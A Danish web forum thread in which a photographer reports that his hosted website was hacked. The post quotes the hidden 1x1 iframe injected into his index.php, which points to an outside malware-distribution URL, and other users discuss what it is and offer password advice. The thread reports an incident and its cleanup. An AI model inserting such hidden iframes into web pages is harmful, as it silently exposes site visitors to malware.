Hov. Du er ikke logget ind.
DU SKAL VÆRE LOGGET IND, FOR AT INTERAGERE PÅ DENNE SIDE

Hjemmeside hacket

Side 1 ud af 1 (6 indlæg)
  • 1
Fra København Ø
Tilmeldt 10. Jan 09
Indlæg ialt: 519
Skrevet kl. 19:02
Hvor mange stjerner giver du? :

Da jeg gik ind på min hjemmeside www.colsenfoto.dk i min Chrome-browser fik jeg en stor rød advarsel om at den indeholdt malware!

Min hjemmeside er hostet hos one.com. Følgende linje var blevet tilføjet index.php filen, og datoen stod til d. 21/8.

<IFRAME src="http://reservus.com/tds/go.php?sid=1" width=1 height=1 style="display:none"></IFRAME>

Jeg har ikke kunnet finde nogen oplysninger om ovenstående.

Er der nogen, der ved, hvad det er for noget gylle?

Jeg har selvfølgelig uploadet min rigtige index.php og ændret password, men ikke foretaget mig yderligere (andet end lige at stikprøve-checke nogle andre filer).

Med venlig hilsen

Carsten

 

Fotograf Carsten Olsen - Bryllupsfotograf og portrætfotograf i København og omegn.

Fra Kalundborg
Tilmeldt 19. Dec 09
Indlæg ialt: 858
Fra  Knockout Marketing Skrevet kl. 19:08
Hvor mange stjerner giver du? :

Mit gæt er at Iframen er en boks på 1x1 der vidersender til en kedelig fil i vinduet uden at man bemærker det.

Få 3 tilbud fra lokale ejendomsmæglere på formidlingen af dine erhvervslokaler (gælder også privat bolig)

Fra Viborg
Tilmeldt 5. Jun 10
Indlæg ialt: 1941
Fra  Modified Solutions ApS Skrevet kl. 19:30
Hvor mange stjerner giver du? :

Jeg besøgte den lige. Min Avast antivirus dukkede op og havde spærret for adgangen - det er malware af en eller anden slags.

Spørgsmål: Var dit password "sikkert" dvs ikke et standard ord?

Brug minimum 16 tegn bestående af bogstaver, tal og special tegn... F.eks:

aS82("#m/$23[&euro;7

Fra København Ø
Tilmeldt 10. Jan 09
Indlæg ialt: 519
Skrevet kl. 21:08
Hvor mange stjerner giver du? :

Tom Frank Christensen:

Jeg besøgte den lige. Min Avast antivirus dukkede op og havde spærret for adgangen - det er malware af en eller anden slags.

Det undrer mig lidt, da jeg allerede havde ordnet filen mindst en times tid før jeg skrev indlægget.

 

Enten må den gamle hackede side ligge i en cache et eller andet sted, eller også har Avest registreret siden som farlig i deres virus-defs.

 

 

Jeg har nu fået checket filerne ganske grundigt (incl. et binært diff på flash-filen) og kune fundet den ene ændring. 

 

 

Jeg fik en virus ind på min computer i den forløbne uge (trods gode forholdsregler), så mit bud er, at den har fundet passwordet på min harddisk og sendt det videre, suk......

Det krævede en reetablering fra backup. Heldigvis er jeg fuldstændig krakilsk med backup, så jeg mistede ingen data - thank-god for al den tid og penge, jeg har "spildt" på den slags Stick out tongue

Jeg er uddannet civilingeniør indenfor elektronik og software og har 10 års erfaring med udvikling, så jeg ved trods alt lidt om, hvordan man garderer sig og jagter den slags uvæsen - men åbenbart ikke nok.

Smile Carsten

 

 

 

Fotograf Carsten Olsen - Bryllupsfotograf og portrætfotograf i København og omegn.

Fra Viborg
Tilmeldt 5. Jun 10
Indlæg ialt: 1941
Fra  Modified Solutions ApS Skrevet kl. 21:11
Hvor mange stjerner giver du? :

Nej jeg gik bare til det link der var angivet i den 1x1 px iframe :) Ikke på din side :P

Fra København Ø
Tilmeldt 10. Jan 09
Indlæg ialt: 519
Skrevet kl. 21:24
Hvor mange stjerner giver du? :

Ok, så havde jeg misforstået dig.

Man bliver jo totalt paranoid af at være under angrebStick out tongue

SmileCarsten

Fotograf Carsten Olsen - Bryllupsfotograf og portrætfotograf i København og omegn.

Side 1 ud af 1 (6 indlæg)